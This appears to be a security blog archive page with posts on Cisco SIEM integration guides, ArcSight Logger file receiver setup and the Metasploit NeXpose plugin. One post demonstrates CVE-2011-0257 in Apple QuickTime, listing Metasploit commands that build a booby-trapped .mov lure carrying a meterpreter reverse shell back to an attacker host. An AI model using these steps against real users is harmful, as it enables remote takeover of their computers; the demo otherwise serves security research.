Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration

11/09/2011Event Management, Log ManagementArcSight, Cisco, LogLogic, netForensics, RSA, SIEM, Splunkwow

Cisco provide some useful Smart Business Architecture (SBA) guides for SIEM solutions integration how will helps you to design and deploy best practices that include Cisco switching, routing, security and wireless technologies.

Actually the SBA guides are covering the following solutions :

SBA guide how provides a general overview of SIEM technology, as well as best practices, use cases, and deployment considerations for using a SIEM with Cisco infrastructure (click here to read). Cisco products logging retrieval methods,
SBA guide for ArcSight SIEM plateform (ESM, Logger, Express, SmartConnectors and Content Pack) integration (click here to read).
SBA guide for Loglogic MX Series SIEM product integration (click here to read).
SBA guide for netForensics nFX Cinxi One SIEM product integration (click here to read).
SBA guide for RSA enVision SIEM product integration (click here to read).
SBA guide for Splunk security management solution (click here to read).

ArcSight Logger File Receiver Configuration

11/09/2011Log ManagementArcSight, Loggerwow

ArcSight Logger propose different kind of receivers :

UDP receiver for UDP messages, such as SYSLOG.
TCP receiver for TCP messages, such as SYSLOG how can also be sent with TCP.
CEF UDP receiver for CEF (Common Event Format) messages sent through UDP.
CEF TCP receiver for CEF (Common Event Format) messages sent through TCP.
SmartMessage receiver for encrypted SmartMessage messages sent by SmartConnectors.
File Transfer to read remote logs using scp, sftp or ftp.
File Receiver to read logs from a local or remote file system such as NFS, CIFS or SAN.

In my previous blog posts, we configured SmartConnectors to send they’re messages to the Logger SmartMessage receiver. The SmartMessage reception method is the most used in an typical ArcSight Log Management infrastructure. With SmartConnectors and SmartMessage receiver usage you can benefit of :

SmartConnector normalization, categorization, aggregation, batching and filtering.
SmartMessage encrypted transmission of messages.

But it could happen that you need to collect events without SmartConnector or FlexConnector. For examples, maybe you have an existing network file system (NFS) to centralize all your Apache HTTP Server logs files, or maybe you are not allowed to install SmartConnector on a system and the policy doesn’t allow to send messages through UDP. File Receiver Logger receivers will provide you alternatives in order to still collect the events.

File Receiver Configuration

ArcSight Logger File Receiver allow you to read files from a network file system (NFS) CIFS, or storage area network (SAN). But the free ArcSight Logger L750MB only allow you File Receiver through a local share. So the ArcSight Logger L750MB processes, how are running under “arcsight” user and group should have the permissions to read and/or write into this share.

In order to setup a File Receiver for ArcSight Logger L750MB, first create a “filereceiver01” folder in “$ARCSIGHT_HOME“. Or you can mount a NFS, CIFS or SAN on the Logger filesystem.

Then log into the Logger Web interface and go into “Configuration -> Event Inpout/Output“. Click on the “Add” button, give a name to your File Receiver (for example: FileReceiver01), select “File Receiver” in the pull-down list and click on the “Next” button.

To complete the setup specify the following information’s :

RFS Names : On a L750MB Logger you can only select “LOCAL“, but on a appliance Logger you can select the previously declared NFS, CIFS or SAN share.
Folder : Specify the folder name, in our example “/home/arcsight/filereceiver01“.
Source Type : Select from the pull-down list your log file types. “Microsoft DHCP Log“, “Juniper Steel-Belted Radius“, “Apache HTTP Server Error“, “Apache HTTP Server Access“, “IBM DB2 Audit” or “Other“. The “Other” choice will allow you to import all kind of logs.
Wildcard (regex) : Allow you through regular expressions to describe the log file to read. “.*” mean all files.
Mode : Select from the pull-down list. With “Persist” mode, the Logger will remember which files have been processed and only processes them once. With “Rename” mode will rename the log file once it has been processed. With “Delete” mode, the file is deleted once it has been processed.
Rename extension : If you have select the “Rename” mode, specify the suffix to append to the log files. By default “.done“.
Character encoding : Select the log file character encoding.
Delay after seen : Specify the number of seconds to wait after a source file is first seen until it is processed. This allows the entire file to be copied before processing begins. By default “10” seconds.
Date/time locale : Select from the pull-down list your locale.
Date/time zone : Select from the pull-down list your time zone, if no time zone is specified into the log file. By default, the time zone is the Logger time zone.
Date/time loc. regex : Allow you through regular expressions to describe which characters represent the timestamps in the log file. By default no timestamp in the log file.
Date/time format : If timestamps are present in the log file, specify the format of the timestamps through format specifiers. By default no timestamps in the log file.
Event start (regex) : If you’re log files are multi-line, you can specify a regular expression how describe the start of a new event in the log file. By default, each line in the log file is considered as a single event.

Then save your configuration. You will have to active the File Receiver by clicking on the right button.

Directly after activating the File Receiver a Device will be created into “Configuration -> Devices“. In order to search easily on the File Receiver events, I recommend you to create a dedicated Device Group (ex : FileReceiver), from “Configuration -> Devices -> Device Groups“, and to associated the newly created File Receiver with this new Device Group.

Also I recommend you, to dedicate a Storage Group (ex : File Receivers) to all events coming from the File Receivers, from “Configuration -> Storage -> Storage Groups“. You can rename on existing Storage Group and adapt the associated retention period and maximum size.

Associate the created Device Group with the renamed Storage Group by Storage Rules, from “Configuration -> Storage -> Storage Rules).

Finally you have to restart the File Receiver by clicking twice on the right button. If you don’t restart the receiver, the Device and Storage Groups associated with the receiver are not active.

Retrieving events from File Receiver

If you have create dedicated Device Groups and/or Storage Groups for both File Receiver, you will be able to easily find the associated events through the Logger search engine.

For searches on Device Groups, just type the following command, where “FileReceiver” is you Device Group.

For searches on Storage Groups, just type the following command, where “File Receivers” is your Storage Group.

You can also mix all these search parameters.

Receivers Debugging

All activities related to the Logger Receivers are located in the “/home/arcsight/current/arcsight/logger/logs/logger_receiver.log” log file.

“receiver_https” is corresponding to the SmartMessage Receiver, and “rfs_file_receiver” to the newly added File Receiver.

“Eps(SLC)” is corresponding to the current EPS rate, “Total Events” is the total number of events the receiver has processed since the last restart, “Eps(max)” the maximum EPS rate the receiver has processed since the last restart, “Bps(SLC)” the bytes per second the receiver has processed.

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

04/09/2011Exploits, MetasploitApple, QuickTimewow

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03

PoC provided by :

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player previous to version 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

Metasploit NeXpose bridge plugin – Part 1

29/08/2011MetasploitNeXpose, Rapid7wow

Metasploit include a bridge plugin between the penetration testing framework Metasploit and the vulnerability management scanner NeXpose from Rapid7. This blog post will describe on how to use the basic commands of this bridge plugin.

As pre-requirements to use the NeXpose bridge plugin, you need first to use Metasploit with a database backend. To connect Metasploit to a database backend just follow the “db_connect” command :

The “db_connect” command will create automatically the database and related tables.

To verify the database connection you can use the “db_status” command.

You can now load the NeXpose bridge plugin with the “load nexpose” command.

Generic commands

Connecting to NeXpose – nexpose_connect :

To connect to NeXpose, just type :

nexpose_connect login:password@nexpose_ip:port <ssl ok>

“login” and “password” variables are you’re NeXpose user login and password. “nexpose_ip” variable is the IP address or the hostname of NeXpose instance. “port” variable is the port where NeXpose is listening, by default 3780/tcp. “ok” variable is for letting you know that nessus use a self signed certificate and that risks are present.

Logout from NeXpose – nexpose_disconnect :

To disconnect from NeXpose, just run the following command :

Checking NeXpose system information – nexpose_sysinfo :

To check the NeXpose system information (db version, java informations, uptime, installation directory, free memory, last update id, etc.), run the following command :

NeXpose Useful Commands

Getting help for NeXpose commands – nexpose_command help :

To have a complete list of all NeXpose commands, just run the following command.

Getting NeXpose versions informations – nexpose_command ver :

This command will display the current software version, serial number, most recent update.

Updating NeXpose engines – nexpose_command update engines :

The following command will send pending updates to all defined Scan Engines.

Check and apply NeXpose updates – nexpose_command update now :

The following command will check for and apply updates manually and immediately, instead of waiting for an automatic, scheduled update.

Getting NeXpose server scheduled jobs – nexpose_command schedule :

The following command will Display the currently scheduled jobs such as scans, auto-update retriever, temporal risk score updater, data warehouse exporter, and log rotation.

Getting a NeXpose database diagnostics- nexpose_command database diagnostics :

The following command will check the database for inconsistencies, such as multiple entries for an asset.

Getting a complete NeXpose diagnostics – nexpose_command diag :

The following command will display diagnostic information that may be useful for debugging or monitoring of activity.

Stopping NeXpose – nexpose_command exit or nexpose_command quit :

These both commands will stop the NeXpose server.

Restarting NeXpose – nexpose_command restart :

This command will restart the NeXpose server.

Ping a host from the NeXpose server – nexpose_command ping HOST [PORT] :

This command will ping the specified host using an ICMP ECHO request, TCP ACK packet, and TCP SYN packet. The default TCP port is 80.

Traceroute from the NeXpose server – nexpose_command traceroute HOST :

This command determine the IP address route between your NeXpose server and the host name or IP address that you specify.

Eric Romang Blog

aka wow on ZATAZ.com